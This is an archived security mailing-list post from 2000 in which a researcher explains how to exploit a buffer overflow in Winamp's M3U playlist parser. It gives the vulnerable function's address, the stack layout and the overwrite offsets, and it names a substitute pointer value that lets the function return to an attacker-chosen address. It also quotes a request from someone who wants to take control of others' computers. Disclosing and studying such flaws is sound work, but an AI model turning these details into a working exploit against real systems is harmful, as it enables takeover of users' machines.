Vulnerability Development mailing list archives
Re: Winamp M3U playlist parser buffer overflow security vulnerability
From: Pauli Ojanpera <pauli_ojanpera () HOTMAIL COM>
Date: Wed, 26 Jul 2000 18:04:58 EEST
LEGAL NOTICE: The same stuff applies to this as to the original post. Once again I was not specific enough in my post to Bugtraq. I guess I never learn. The faulty function in question starts at memory address 0x411FE5. The function has a local variable stored in stack right after the buffer to be overflowed and right before the stored frame pointer (EBP). This way: [Return address] = 4 bytes [Stored frame pointer (EBP)] = 4 bytes [FILE *fp] = 4 bytes [Buffer to overflow (#EXTINF: parameter)] = 269 bytes In order to get the function to successfully return, the file pointer in between the buffer and the stored frame pointer MUST point to a valid FILE record. (I indeed am not sure if it is a FILE pointer, but it is a pointer to a some record anyway.) Because the FILE pointer pointer contains a zero in it, it cannot be overwritten right to hold the same old value it had. I however found out a valid address in IN_MOD plugin address space that I could use to fool the function to believe the pointer points to a valid record. That address doesn't have values that couldn't be embedded in the string. The file (ATTACK.M3U) I attached to my original post, has this value (0x1111A1A0) in the right position (bytes 270-273) in the parameter string. After that, it has a dummy frame pointer value ('PPPP') and next is the return address to jump to ('AAAA'). With a runtime debugger (not to mention one :) you can breakpoint at 0x411FE5 and inspect the stack frame to see how things are stored there. P.S. I'm f*en sorry for my probably erraneous English. 8-] ----Original Message Follows---- From: xxx <xxx@xxx> To: "Pauli Ojanpera" <pauli_ojanpera () HOTMAIL COM> Subject: Re: Winamp M3U playlist parser buffer overflow security vulnerability Date: Mon, 24 Jul 2000 14:30:50 -0400 hey man, i got that sploit you found in winamp. useing the 280 A's well you also stated that you can take control over there computer. well i have been trying and i cant seem to find how you can control them. do you think you can guide me to any way the works. thanks alot man. xxx. ________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com
Current thread:
- Re: Winamp M3U playlist parser buffer overflow security vulnerability Pauli Ojanpera (Jul 27)